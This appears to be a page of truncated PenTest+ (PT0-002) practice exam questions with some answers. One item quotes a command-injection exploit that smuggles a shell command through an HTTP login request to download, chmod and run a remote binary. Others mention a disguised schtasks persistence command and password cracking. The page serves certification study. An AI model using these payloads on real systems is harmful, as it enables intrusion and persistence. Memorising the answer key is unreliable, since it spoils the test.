PT0-002 exam

A penetration tester is cleaning up and covering tracks at the conclusion of a penetration test. Which of the following should the tester be sure to remove from the system? (Choose two.)A . Spawned shells B. Created user accounts C. Server logs D. Administrator accounts E. Reboot system F. ARP...

A penetration tester runs the unshadow command on a machine. Which of the following tools will the tester most likely use NEXT?A . John the Ripper B. Hydra C. Mimikatz D. Cain and AbelView AnswerAnswer: A Explanation: Reference: https://www.cyberciti.biz/faq/unix-linux-password-cracking-john-the-ripper/

A penetration tester was able to gain access to a system using an exploit. The following is a snippet of the code that was utilized: exploit = “POST ” exploit += “/cgi-bin/index.cgi?action=login&Path=%27%0A/bin/sh${IFS} C c${IFS}’cd${IFS}/tmp;${IFS}wget${IFS}http://10.10.0.1/apache;${IFS}chmod${IFS}777${IFS }apache;${IFS}./apache’%0A%27&loginUser=a&Pwd=a” exploit += “HTTP/1.1” Which of the following commands should the penetration tester run post-engagement?A ....

When planning a penetration-testing effort, clearly expressing the rules surrounding the optimal time of day for test execution is important because:A . security compliance regulations or laws may be violated. B. testing can make detecting actual APT more challenging. C. testing adds to the workload of defensive cyber- and threat-hunting...

Which of the following describes the reason why a penetration tester would run the command sdelete mimikatz. * on a Windows server that the tester compromised?A . To remove hash-cracking registry entries B. To remove the tester-created Mimikatz account C. To remove tools from the server D. To remove a...

A penetration tester conducted a discovery scan that generated the following: Which of the following commands generated the results above and will transform them into a list of active hosts for further analysis?A . nmap CoG list.txt 192.168.0.1-254 , sort B. nmap Csn 192.168.0.1-254 , grep “Nmap scan” | awk...

A penetration tester receives the following results from an Nmap scan: Which of the following OSs is the target MOST likely running?A . CentOS B. Arch Linux C. Windows Server D. UbuntuView AnswerAnswer: C

A security professional wants to test an IoT device by sending an invalid packet to a proprietary service listening on TCP port 3011. Which of the following would allow the security professional to easily and programmatically manipulate the TCP header length and checksum using arbitrary numbers and to observe how...

A penetration tester discovers that a web server within the scope of the engagement has already been compromised with a backdoor. Which of the following should the penetration tester do NEXT?A . Forensically acquire the backdoor Trojan and perform attribution B. Utilize the backdoor in support of the engagement C....

A penetration tester was able to gain access successfully to a Windows workstation on a mobile client’s laptop. Which of the following can be used to ensure the tester is able to maintain access to the system?A . schtasks /create /sc /ONSTART /tr C:TempWindowsUpdate.exe B. wmic startup get caption,command C....